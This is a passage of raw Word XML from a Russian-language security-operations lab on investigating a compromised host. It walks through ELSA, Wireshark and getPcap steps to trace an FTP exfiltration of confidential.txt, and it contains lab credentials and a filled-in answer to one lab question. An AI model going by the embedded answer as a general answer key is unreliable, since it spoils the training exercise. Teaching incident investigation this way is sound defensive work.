        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t>Также можно щелкнуть правой кнопкой мыши по идентификатору оповещения</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">выбрать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для просмотра</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>сохранения файла pcap</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>потока TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC482E8" w14:textId="6025D867" w:rsidR="0073224A" w:rsidRDefault="0073224A" w:rsidP="0073224A">
      <w:pPr>
        <w:pStyle w:val="StepHead"/>
      </w:pPr>
      <w:r>
        <w:t>Используйте ELSA для просмотра излеченных данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DD2AC2" w14:textId="749E5110" w:rsidR="00E84B02" w:rsidRDefault="00E84B02" w:rsidP="005D1040">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t>Для того чтобы использовать ELSA для получения дополнительных сведений</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> о </w:t>
      </w:r>
      <w:r>
        <w:t>том же оповещении, что</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>выше, щелкните правой кнопкой мыши IP-адрес источника или назначения</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">выберите </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ELSA IP Lookup (Поиск IP-адреса ELSA)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DstIP</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCE0201" w14:textId="130290CA" w:rsidR="00481437" w:rsidRDefault="00481437" w:rsidP="006E123B">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Нажмите кнопку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>bro_ftp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для просмотра журналов ELSA, которые относятся</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> к </w:t>
      </w:r>
      <w:r>
        <w:t>FTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DB4677" w14:textId="76377BD9" w:rsidR="00346A7E" w:rsidRDefault="00346A7E" w:rsidP="00346A7E">
      <w:pPr>
        <w:pStyle w:val="Visual"/>
      </w:pPr>
      <w:r w:rsidRPr="00346A7E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="499722A7" wp14:editId="5C23D429">
            <wp:extent cx="4572000" cy="3052989"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="55" name="Picture 55" descr="Screenshot shows ELSA logs related to FT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7E66" w14:textId="3792124A" w:rsidR="00481437" w:rsidRDefault="001F44CE" w:rsidP="006E123B">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Какой файл был передан по протоколу FTP на адрес 209.165.200.235? Чья учетная запись была использована для передачи файла?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA94A60" w14:textId="7FD81AE2" w:rsidR="001F44CE" w:rsidRPr="005C5D3E" w:rsidRDefault="005C5D3E" w:rsidP="001F44CE">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>analyst</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFEE367" w14:textId="30842716" w:rsidR="00781A46" w:rsidRDefault="001F44CE" w:rsidP="00781A46">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Нажмите кнопку </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00781A46">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00781A46">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> (Информация)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для просмотра транзакций</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t>последней записи. Поле reply_msg указывает, что это последняя запись</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> о </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">передаче файла confidential.txt. Выберите </w:t>
      </w:r>
      <w:r w:rsidR="00781A46" w:rsidRPr="00781A46">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Plugin (Подключаемый модуль)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00781A46" w:rsidRPr="00781A46">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>getPcap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. По запросу введите имя пользователя </w:t>
      </w:r>
      <w:r w:rsidR="00781A46" w:rsidRPr="00781A46">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>analyst</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">пароль </w:t>
      </w:r>
      <w:r w:rsidR="00781A46" w:rsidRPr="00781A46">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cyberops</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. При необходимости нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidR="00781A46" w:rsidRPr="00781A46">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Submit (Отправить)</w:t>
      </w:r>
      <w:r>
        <w:t>. CapMe — это веб-интерфейс, который позволяет получить запись pcap или загрузить файл pcap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7066F00F" w14:textId="77777777" w:rsidR="00781A46" w:rsidRDefault="00781A46" w:rsidP="00781A46">
      <w:pPr>
        <w:pStyle w:val="Visual"/>
      </w:pPr>
      <w:r w:rsidRPr="00001B6A">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="012F00E3" wp14:editId="456B8DE9">
            <wp:extent cx="2286000" cy="1380985"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="Picture 7" descr="Screenshot of Log Info showing getPcap selected under Plugin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6337" w14:textId="6629CF27" w:rsidR="00781A46" w:rsidRDefault="00781A46" w:rsidP="00063E79">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Запись pcap отображается</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t>помощью средства tcpflow,</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>эта страница также содержит ссылку для доступа</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> к </w:t>
      </w:r>
      <w:r>
        <w:t>соответствующему файлу pcap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EFA96E" w14:textId="1911D79D" w:rsidR="001F44CE" w:rsidRDefault="001F44CE" w:rsidP="00063E79">
      <w:pPr>
        <w:pStyle w:val="Visual"/>
      </w:pPr>
      <w:r w:rsidRPr="001F44CE">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67EB591D" wp14:editId="181D0F81">
            <wp:extent cx="4572000" cy="2988582"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="56" name="Picture 56" descr="Screenshot showing the pcap transcri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69D1" w14:textId="5B42CC29" w:rsidR="001F44CE" w:rsidRDefault="001F44CE" w:rsidP="001F44CE">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для того чтобы определить содержимое файла, который был скомпрометирован, откройте </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ELSA</w:t>
      </w:r>
      <w:r>
        <w:t>, дважды щелкнув по значку на рабочем столе, чтобы открыть новую вкладку</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>выполнить новый поиск.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67998FCE" w14:textId="08312564" w:rsidR="001F44CE" w:rsidRDefault="00310E92" w:rsidP="00F04BF1">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Разверните раздел </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>FTP</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">нажмите кнопку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>FTP Data (Данные FTP)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Щелкните одну из ссылок </w:t>
      </w:r>
      <w:r w:rsidRPr="00310E92">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Info (Информация)</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>выберите</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t>раскрывающемся меню пункт getPcap, чтобы просмотреть содержимое украденного файла.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C81AAD" w14:textId="640BE989" w:rsidR="001F44CE" w:rsidRDefault="001F44CE" w:rsidP="0042041D">
      <w:pPr>
        <w:pStyle w:val="Visual"/>
        <w:spacing w:beforeLines="50" w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F797AEA" wp14:editId="64D7B456">
            <wp:extent cx="5486400" cy="2651414"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="59" name="Picture 59" descr="Screenshot showing a new ELSA tab with the FTP data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B1838" w14:textId="3B46E9C8" w:rsidR="001A13CE" w:rsidRDefault="00296522" w:rsidP="00063E79">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Результат отображает содержимое файла</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">именем </w:t>
      </w:r>
      <w:r w:rsidRPr="0073224A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>confidential.txt</w:t>
      </w:r>
      <w:r>
        <w:t>, который был передан на указанный сервер FTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7C0FBB" w14:textId="05680A86" w:rsidR="008C7B5D" w:rsidRDefault="008C7B5D" w:rsidP="0042041D">
      <w:pPr>
        <w:pStyle w:val="Visual"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="008C7B5D">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03686763" wp14:editId="2B2E1FC3">
            <wp:extent cx="5486400" cy="2231027"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="Picture 5" descr="Screenshot of the results of clicking on a Info link and selecting getPca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467" w14:textId="2D9305E8" w:rsidR="00852F59" w:rsidRDefault="00AA5D99" w:rsidP="00852F59">
      <w:pPr>
        <w:pStyle w:val="StepHead"/>
      </w:pPr>
      <w:r>
        <w:t>Удаление конфигурации</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DA1D27" w14:textId="7E016DCE" w:rsidR="00AA5D99" w:rsidRPr="00AA5D99" w:rsidRDefault="00AA5D99" w:rsidP="0073224A">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
      </w:pPr>
      <w:r>
        <w:t>Закончив анализ, выключите все виртуальные машины.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764DE0E7" w14:textId="3723C45A" w:rsidR="001F44CE" w:rsidRDefault="001F44CE" w:rsidP="00296522">
      <w:pPr>
        <w:pStyle w:val="LabSection"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Вопросы для повторения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6E4C84" w14:textId="11B95957" w:rsidR="001F44CE" w:rsidRDefault="00347F1A" w:rsidP="001F44CE">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
      </w:pPr>
      <w:r>
        <w:t>В этой лабораторной работе вы использовали уязвимость, чтобы получить доступ</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> к </w:t>
      </w:r>
      <w:r>
        <w:t>несанкционированной информации,</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>просматривали журналы</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t>качестве аналитика по кибербезопасности. Теперь кратко изложите свои результаты.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F148630" w14:textId="77777777" w:rsidR="00347F1A" w:rsidRDefault="00347F1A" w:rsidP="001F44CE">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
      </w:pPr>
      <w:r>
        <w:t>_______________________________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284927A6" w14:textId="31FAB23F" w:rsidR="00347F1A" w:rsidRDefault="00347F1A" w:rsidP="001F44CE">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
      </w:pPr>
      <w:r>
        <w:t>_______________________________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF0105B" w14:textId="77777777" w:rsidR="009136AB" w:rsidRDefault="009136AB" w:rsidP="009136AB">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
      </w:pPr>
      <w:r>
        <w:t>_______________________________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7994E37D" w14:textId="61724287" w:rsidR="00691945" w:rsidRDefault="00691945" w:rsidP="00691945">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
      </w:pPr>
      <w:r>
        <w:t>_______________________________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00691945" w:rsidSect="008C4307">
      <w:headerReference w:type="default" r:id="rId40"/>
      <w:footerReference w:type="default" r:id="rId41"/>
      <w:footerReference w:type="first" r:id="rId4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790B" w14:textId="77777777" w:rsidR="00D6675E" w:rsidRDefault="00D6675E" w:rsidP="000D3B4F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCE9641" w14:textId="77777777" w:rsidR="00D6675E" w:rsidRDefault="00D6675E"/>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3189A201" w14:textId="77777777" w:rsidR="00D6675E" w:rsidRDefault="00D6675E" w:rsidP="000D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0557" w14:textId="67622B13" w:rsidR="00875021" w:rsidRPr="00D52C01" w:rsidRDefault="00875021" w:rsidP="00D52C01">
    <w:pPr>
      <w:pStyle w:val="a6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8855F4">
      <w:rPr>
        <w:rFonts w:eastAsia="SimSun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4347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4347A">
      <w:rPr>
        <w:b/>
        <w:noProof/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>20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ACF7" w14:textId="1049AA1F" w:rsidR="00875021" w:rsidRPr="00D52C01" w:rsidRDefault="00875021" w:rsidP="00D52C01">
    <w:pPr>
      <w:pStyle w:val="a6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8855F4">
      <w:rPr>
        <w:rFonts w:eastAsia="SimSun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4347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4347A">
      <w:rPr>
        <w:b/>
        <w:noProof/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>20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8D8F" w14:textId="77777777" w:rsidR="00D6675E" w:rsidRDefault="00D6675E" w:rsidP="000D3B4F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E778968" w14:textId="77777777" w:rsidR="00D6675E" w:rsidRDefault="00D6675E"/>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0E155EE8" w14:textId="77777777" w:rsidR="00D6675E" w:rsidRDefault="00D6675E" w:rsidP="000D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FCC3" w14:textId="3B0D9C5A" w:rsidR="00875021" w:rsidRDefault="00875021" w:rsidP="008402F2">
    <w:pPr>
      <w:pStyle w:val="PageHead"/>
    </w:pPr>
    <w:r>
      <w:t>Лабораторная работа. Скомпрометированный хост, изолированный по методике</w:t>
    </w:r>
    <w:r w:rsidR="00BD63E7">
      <w:t xml:space="preserve"> 5 </w:t>
    </w:r>
    <w:r>
      <w:t>элем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05025B4"/>
    <w:styleLink w:val="PartStepSubStepList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5767C7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="736C8F9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496189424">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1586380335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70803845">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1190726816">
    <w:abstractNumId w:val="3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23589954">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="779449917">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1357928334">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1840585064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57679500">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1842967315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36983557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C52"/>
    <w:rsid w:val="00000B53"/>
    <w:rsid w:val="00001BDF"/>
    <w:rsid w:val="0000380F"/>
    <w:rsid w:val="00004175"/>
    <w:rsid w:val="000059C9"/>
    <w:rsid w:val="000112B4"/>
    <w:rsid w:val="00011F5C"/>
    <w:rsid w:val="00012C22"/>
    <w:rsid w:val="000143C8"/>
    <w:rsid w:val="000160F7"/>
    <w:rsid w:val="00016D5B"/>
    <w:rsid w:val="00016F30"/>
    <w:rsid w:val="0002047C"/>
    <w:rsid w:val="00021B9A"/>
    <w:rsid w:val="000242D6"/>
    <w:rsid w:val="0002463E"/>
    <w:rsid w:val="00024EE5"/>
    <w:rsid w:val="00025C56"/>
    <w:rsid w:val="000270DE"/>
    <w:rsid w:val="00037870"/>
    <w:rsid w:val="00040416"/>
    <w:rsid w:val="00041AF6"/>
    <w:rsid w:val="000445EC"/>
    <w:rsid w:val="000447FA"/>
    <w:rsid w:val="00044E62"/>
    <w:rsid w:val="0005084E"/>
    <w:rsid w:val="00050BA4"/>
    <w:rsid w:val="00050C25"/>
    <w:rsid w:val="00051738"/>
    <w:rsid w:val="00052548"/>
    <w:rsid w:val="00054E98"/>
    <w:rsid w:val="000568AE"/>
    <w:rsid w:val="00060696"/>
    <w:rsid w:val="00063E79"/>
    <w:rsid w:val="00067A67"/>
    <w:rsid w:val="000769CF"/>
    <w:rsid w:val="000815D8"/>
    <w:rsid w:val="000826DF"/>
    <w:rsid w:val="00084C99"/>
    <w:rsid w:val="000855E5"/>
    <w:rsid w:val="00085CC6"/>
    <w:rsid w:val="00090C07"/>
    <w:rsid w:val="0009147A"/>
    <w:rsid w:val="00091E8D"/>
    <w:rsid w:val="0009378D"/>
    <w:rsid w:val="000947D5"/>
    <w:rsid w:val="00097163"/>
    <w:rsid w:val="000A22C8"/>
    <w:rsid w:val="000A42A8"/>
    <w:rsid w:val="000B066F"/>
    <w:rsid w:val="000B2344"/>
    <w:rsid w:val="000B30C8"/>
    <w:rsid w:val="000B7C63"/>
    <w:rsid w:val="000B7DE5"/>
    <w:rsid w:val="000C0D35"/>
    <w:rsid w:val="000C2118"/>
    <w:rsid w:val="000C2F3F"/>
    <w:rsid w:val="000C3AB5"/>
    <w:rsid w:val="000C506E"/>
    <w:rsid w:val="000C6E6E"/>
    <w:rsid w:val="000C6EC9"/>
    <w:rsid w:val="000C7527"/>
    <w:rsid w:val="000D18F9"/>
    <w:rsid w:val="000D258F"/>
    <w:rsid w:val="000D3B4F"/>
    <w:rsid w:val="000D4563"/>
    <w:rsid w:val="000D55B4"/>
    <w:rsid w:val="000D7898"/>
    <w:rsid w:val="000E58A0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52D8"/>
    <w:rsid w:val="001068AC"/>
    <w:rsid w:val="00107B2B"/>
    <w:rsid w:val="00112AC5"/>
    <w:rsid w:val="001133DD"/>
    <w:rsid w:val="0011426E"/>
    <w:rsid w:val="00114F04"/>
    <w:rsid w:val="0011763C"/>
    <w:rsid w:val="00120CBE"/>
    <w:rsid w:val="00121BAE"/>
    <w:rsid w:val="001261C4"/>
    <w:rsid w:val="0012703D"/>
    <w:rsid w:val="001314FB"/>
    <w:rsid w:val="001319BA"/>
    <w:rsid w:val="00131B34"/>
    <w:rsid w:val="00135561"/>
    <w:rsid w:val="001366EC"/>
    <w:rsid w:val="00137571"/>
    <w:rsid w:val="0014021C"/>
    <w:rsid w:val="0014219C"/>
    <w:rsid w:val="001425ED"/>
    <w:rsid w:val="00143450"/>
    <w:rsid w:val="00144997"/>
    <w:rsid w:val="00145C0F"/>
    <w:rsid w:val="00146F0C"/>
    <w:rsid w:val="001516CD"/>
    <w:rsid w:val="001523C0"/>
    <w:rsid w:val="001535FE"/>
    <w:rsid w:val="001537FB"/>
    <w:rsid w:val="00154E3A"/>
    <w:rsid w:val="00157902"/>
    <w:rsid w:val="00162105"/>
    <w:rsid w:val="00162EEA"/>
    <w:rsid w:val="00163164"/>
    <w:rsid w:val="001660F4"/>
    <w:rsid w:val="00166253"/>
    <w:rsid w:val="00166EDC"/>
    <w:rsid w:val="001704B7"/>
    <w:rsid w:val="001710C0"/>
    <w:rsid w:val="0017192E"/>
    <w:rsid w:val="00171E47"/>
    <w:rsid w:val="00172AFB"/>
    <w:rsid w:val="001742CE"/>
    <w:rsid w:val="001772B8"/>
    <w:rsid w:val="00180FBF"/>
    <w:rsid w:val="00182CF4"/>
    <w:rsid w:val="00186CE1"/>
    <w:rsid w:val="00191F00"/>
    <w:rsid w:val="00192ABD"/>
    <w:rsid w:val="00192F12"/>
    <w:rsid w:val="00193F14"/>
    <w:rsid w:val="00197614"/>
    <w:rsid w:val="001A0312"/>
    <w:rsid w:val="001A0B8C"/>
    <w:rsid w:val="001A13CE"/>
    <w:rsid w:val="001A15DA"/>
    <w:rsid w:val="001A2694"/>
    <w:rsid w:val="001A3CC7"/>
    <w:rsid w:val="001A4AC3"/>
    <w:rsid w:val="001A67A4"/>
    <w:rsid w:val="001A69AC"/>
    <w:rsid w:val="001A6DD1"/>
    <w:rsid w:val="001B52E2"/>
    <w:rsid w:val="001B67D8"/>
    <w:rsid w:val="001B6F95"/>
    <w:rsid w:val="001C05A1"/>
    <w:rsid w:val="001C1D9E"/>
    <w:rsid w:val="001C5998"/>
    <w:rsid w:val="001C7C3B"/>
    <w:rsid w:val="001D0BC7"/>
    <w:rsid w:val="001D1FFA"/>
    <w:rsid w:val="001D5B6F"/>
    <w:rsid w:val="001E0AB8"/>
    <w:rsid w:val="001E38E0"/>
    <w:rsid w:val="001E3C81"/>
    <w:rsid w:val="001E4E72"/>
    <w:rsid w:val="001E585A"/>
    <w:rsid w:val="001E62B3"/>
    <w:rsid w:val="001F0171"/>
    <w:rsid w:val="001F0D77"/>
    <w:rsid w:val="001F195B"/>
    <w:rsid w:val="001F2838"/>
    <w:rsid w:val="001F44CE"/>
    <w:rsid w:val="001F4A07"/>
    <w:rsid w:val="001F7DD8"/>
    <w:rsid w:val="00201928"/>
    <w:rsid w:val="00203E26"/>
    <w:rsid w:val="002040ED"/>
    <w:rsid w:val="0020449C"/>
    <w:rsid w:val="00206BB1"/>
    <w:rsid w:val="002113B8"/>
    <w:rsid w:val="00214488"/>
    <w:rsid w:val="00215665"/>
    <w:rsid w:val="00215FDF"/>
    <w:rsid w:val="002163BB"/>
    <w:rsid w:val="0021792C"/>
    <w:rsid w:val="002240AB"/>
    <w:rsid w:val="00225E37"/>
    <w:rsid w:val="00227C9E"/>
    <w:rsid w:val="00231DCA"/>
    <w:rsid w:val="002335FC"/>
    <w:rsid w:val="002417C7"/>
    <w:rsid w:val="00241F66"/>
    <w:rsid w:val="00242E3A"/>
    <w:rsid w:val="002461ED"/>
    <w:rsid w:val="002506CF"/>
    <w:rsid w:val="0025107F"/>
    <w:rsid w:val="002519B2"/>
    <w:rsid w:val="00260CD4"/>
    <w:rsid w:val="002639D8"/>
    <w:rsid w:val="00265F77"/>
    <w:rsid w:val="00266168"/>
    <w:rsid w:val="00266C83"/>
    <w:rsid w:val="00274E27"/>
    <w:rsid w:val="002768DC"/>
    <w:rsid w:val="0028003E"/>
    <w:rsid w:val="002821A7"/>
    <w:rsid w:val="00286A54"/>
    <w:rsid w:val="00294C8F"/>
    <w:rsid w:val="00296522"/>
    <w:rsid w:val="002A2F19"/>
    <w:rsid w:val="002A6C56"/>
    <w:rsid w:val="002B53BC"/>
    <w:rsid w:val="002C090C"/>
    <w:rsid w:val="002C1243"/>
    <w:rsid w:val="002C1815"/>
    <w:rsid w:val="002C475E"/>
    <w:rsid w:val="002C6657"/>
    <w:rsid w:val="002C6AD6"/>
    <w:rsid w:val="002D275B"/>
    <w:rsid w:val="002D6C2A"/>
    <w:rsid w:val="002D7A12"/>
    <w:rsid w:val="002D7A86"/>
    <w:rsid w:val="002D7C8B"/>
    <w:rsid w:val="002E33C0"/>
    <w:rsid w:val="002E3DC3"/>
    <w:rsid w:val="002F102A"/>
    <w:rsid w:val="002F1F9C"/>
    <w:rsid w:val="002F3B3D"/>
    <w:rsid w:val="002F3B90"/>
    <w:rsid w:val="002F45FF"/>
    <w:rsid w:val="002F4A33"/>
    <w:rsid w:val="002F66D3"/>
    <w:rsid w:val="002F6D17"/>
    <w:rsid w:val="002F6EA1"/>
    <w:rsid w:val="00302887"/>
    <w:rsid w:val="0030477D"/>
    <w:rsid w:val="003056EB"/>
    <w:rsid w:val="003071FF"/>
    <w:rsid w:val="00310652"/>
    <w:rsid w:val="00310CE6"/>
    <w:rsid w:val="00310E92"/>
    <w:rsid w:val="0031124C"/>
    <w:rsid w:val="0031371D"/>
    <w:rsid w:val="00315F42"/>
    <w:rsid w:val="0031789F"/>
    <w:rsid w:val="00320420"/>
    <w:rsid w:val="00320788"/>
    <w:rsid w:val="003210F4"/>
    <w:rsid w:val="003233A3"/>
    <w:rsid w:val="00323EF0"/>
    <w:rsid w:val="00334CA6"/>
    <w:rsid w:val="00336913"/>
    <w:rsid w:val="00342D49"/>
    <w:rsid w:val="0034455D"/>
    <w:rsid w:val="0034471B"/>
    <w:rsid w:val="0034604B"/>
    <w:rsid w:val="00346967"/>
    <w:rsid w:val="00346A7E"/>
    <w:rsid w:val="00346D17"/>
    <w:rsid w:val="00347972"/>
